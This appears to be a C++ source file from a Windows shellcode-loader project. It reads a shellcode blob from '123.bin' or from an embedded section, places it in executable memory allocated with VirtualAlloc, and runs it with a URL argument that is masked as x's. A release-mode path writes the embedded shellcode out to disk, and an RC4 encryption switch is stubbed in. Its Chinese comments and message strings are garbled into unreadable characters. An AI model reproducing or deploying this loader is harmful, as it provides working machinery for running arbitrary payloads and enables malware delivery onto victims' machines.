exe2shellcode/RmExecute/Loader.cpp

// RcDllShelcode.cpp : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̨Ӧ<CCA8>ó<EFBFBD><C3B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵ㡣
//

#include "stdafx.h"
#include<Windows.h>
#include"ShellCode.h"
#pragma warning(disable:4996)
//#pragma comment(linker, "/section:.data,RWE")   

DWORD ReadFileData(char *szFilePath, char *pBuf)
{
	DWORD dwBytesRead;
	HANDLE hFile;

	hFile = CreateFile(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
		OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (hFile == INVALID_HANDLE_VALUE)
	{
		return 0;
	}

	DWORD dwFileSize = GetFileSize(hFile, 0);
	if (dwFileSize == 0)
	{
		CloseHandle(hFile);
		return 0;
	}

	ReadFile(hFile, pBuf, dwFileSize, &dwBytesRead, NULL);
	CloseHandle(hFile);
	return dwFileSize;
}
DWORD GetFileSizeLen(char *szSource)
{

	HANDLE hFile;

	hFile = CreateFile(szSource, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if (hFile == INVALID_HANDLE_VALUE)
	{
		MessageBoxA(NULL, "<EFBFBD>ļ<EFBFBD>δ<EFBFBD>ҵ<EFBFBD><EFBFBD><EFBFBD>", NULL, NULL);
		return 0;
	}

	DWORD dwFileSize = GetFileSize(hFile, 0);
	if (dwFileSize == 0)
	{
		MessageBoxA(NULL, "<EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD>㣡", NULL, NULL);
		CloseHandle(hFile);
		return 0;
	}
	CloseHandle(hFile);
	return dwFileSize;
}


#ifndef RUNEXEMT
void RunShellCode()
{
	int dwShellCodeLen = (int)mmLoaderSCEnd - (int)mmLoaderSCStart;

	void* shellcodeEnter = mmLoaderSCStart;
	typedef void(WINAPI* fnFun)(
		char*
		);
	char URL[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
	fnFun Shellcode = (fnFun)(shellcodeEnter);
	Shellcode(URL);

}
#else

void RunShellCode()
{
	
	char shelname[] = "123.bin";

	DWORD filelen = GetFileSizeLen(shelname);
	char *filebuf = new char[filelen];
	ReadFileData(shelname, filebuf);

	char URL[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

	typedef void(WINAPI* fnFun)(
		char*
		);
	PVOID p = NULL;
	if ((p = VirtualAlloc(NULL, filelen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		MessageBoxA(NULL, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>ʧ<EFBFBD><EFBFBD>", "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>", MB_OK);
	if (!(memcpy(p, filebuf, filelen)))
		MessageBoxA(NULL, "д<EFBFBD>ڴ<EFBFBD>ʧ<EFBFBD><EFBFBD>", "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>", MB_OK);
	fnFun Shellcode = (fnFun)p;
	Shellcode(URL);

}
#endif


/*
<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Shelocde<EFBFBD><EFBFBD>д,<EFBFBD><EFBFBD>ȡ,<EFBFBD><EFBFBD><EFBFBD><EFBFBD>

Debugģʽ<EFBFBD>£<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ա<EFBFBD>д<EFBFBD><EFBFBD>shelcode<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

ReleaseģʽΪ<EFBFBD><EFBFBD>ȡshelcode<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ķ<EFBFBD><EFBFBD>ǿ<EFBFBD><EFBFBD><EFBFBD>ֱ<EFBFBD><EFBFBD>call<EFBFBD>Ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

RUN_EXE_MT <EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD>exe
*/
#ifdef RUNEXEMT
/*
int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
	_In_opt_ HINSTANCE hPrevInstance,
	_In_ LPTSTR    lpCmdLine,
	_In_ int       nCmdShow)
{
*/
int _tmain(int argc, _TCHAR* argv[])
{
	RunShellCode();
	return 0;
#else

int _tmain(int argc, _TCHAR* argv[])
{
	
#endif


#ifdef _DEBUG
	
	
	RunShellCode();
	
	return 0;
#else
//<2F><><EFBFBD>üӽ<C3BC><D3BD>ܵĿ<DCB5><C4BF><EFBFBD>
// #define RC4_EN

	//<2F><><EFBFBD><EFBFBD>
	int dwShellCodeLen = (int)mmLoaderSCEnd - (int)mmLoaderSCStart;

	void * shellcodeEnter =mmLoaderSCStart;


	//<2F><><EFBFBD><EFBFBD>shellcode<64>ļ<EFBFBD>
	FILE *fp;
	fp = fopen("123.bin", "w+b");
	if (fp)
	{
#ifdef RC4_EN
		fwrite(shellcodeEnter, (dwShellCodeLen + sizeof(s_flag)*2), 1, fp);
#else
		fwrite(shellcodeEnter, dwShellCodeLen, 1, fp);
#endif
		fclose(fp);
	}

	return 0;
#endif
}